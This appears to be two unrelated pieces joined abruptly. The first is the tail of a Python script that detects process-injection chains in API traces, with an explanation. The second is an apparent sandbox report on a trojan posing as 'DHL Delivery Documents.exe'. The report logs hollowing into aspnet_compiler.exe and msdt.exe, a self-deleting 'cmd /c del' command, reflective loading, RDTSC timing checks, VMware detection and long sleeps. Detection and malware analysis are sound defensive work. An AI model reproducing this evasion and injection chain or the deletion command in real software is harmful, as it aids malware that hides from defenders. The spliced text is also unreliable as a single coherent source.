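        r = _first_after(calls, RUN, h) if h is not None else None
        if r is None:
            continue
        apis = {api for _, api in calls}
        if "NtUnmapViewOfSection" in apis:
            technique = "process hollowing"
        elif "NtQueueApcThread" in apis:
            technique = "APC injection"
        else:
            technique = "thread context hijack"
        findings.append({"source": src, "target": dst,
                         "technique": technique, "apis": sorted(apis)})
    return findings


if __name__ == "__main__":
    for f in find_injection_chains(parse_trace(TRACE)):
        print(f"pid {f['source']} -> pid {f['target']}: {f['technique']} "
              f"via {', '.join(f['apis'])}")
```

On the constructed trace this reports pid 100 hollowing pid 200 and pid 200 APC-injecting into pid 300, and nothing for pid 400. In a real trace the caller/target relation comes from the handle passed to each call, so the collector has to resolve NtOpenProcess and NtCreateProcessEx handles to pids first; a remote NtMapViewOfSection on its own is also used by legitimate loaders, which is why the rule insists on the later redirect-and-resume steps rather than alerting on any single call.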
          Source: DHL Delivery Documents.exeStatic PE information: No import functions for PE file found
          Source: DHL Delivery Documents.exeBinary or memory string: OriginalFilename vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297172945.0000000001360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297160400.0000000001350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297081764.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBNCXGAS.exe0 vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297200414.000000000139A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exeBinary or memory string: OriginalFilenameBNCXGAS.exe0 vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DHL Delivery Documents.exeVirustotal: Detection: 30%
          Source: DHL Delivery Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL Delivery Documents.exe "C:\Users\user\Desktop\DHL Delivery Documents.exe"
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL Delivery Documents.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@1/1
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: DHL Delivery Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DHL Delivery Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: DHL Delivery Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msdt.pdbGCTL source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: BNCXGAS.pdb source: DHL Delivery Documents.exe
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: .pdbBSJB source: DHL Delivery Documents.exe, 00000002.00000002.297160400.0000000001350000.00000004.08000000.00040000.00000000.sdmp, DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: msdt.exe, 0000000C.00000002.620930532.0000000005987000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000C.00000002.596381462.0000000003775000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: DHL Delivery Documents.exe, BNCXGAS/Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C805 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B832 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B83B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B8D3 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B89C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C130 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C235 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C367 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C31E push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0040D438 push es; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00414F52 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B7E5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0144D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C31E push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C367 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C281 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C130 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C805 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B832 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B83B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B89C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B8D3 push edx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03144F52 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B7E5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0313D438 push es; retf
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000003138614 second address: 000000000313861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000031389AE second address: 00000000031389B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe TID: 2228Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe TID: 6792Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 6.3 %
          Source: C:\Windows\SysWOW64\msdt.exeAPI coverage: 6.5 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000008.00000000.327847130.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.309195507.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000008.00000000.327847130.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000008.00000000.323844313.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.323844313.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000008.00000000.301405872.0000000000C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: explorer.exe, 00000008.00000000.327847130.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: DHL Delivery Documents.exe, 00000002.00000002.297292575.000000000144A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01410050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01410050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A830 mov eax, dword ptr fs:[00000030h]
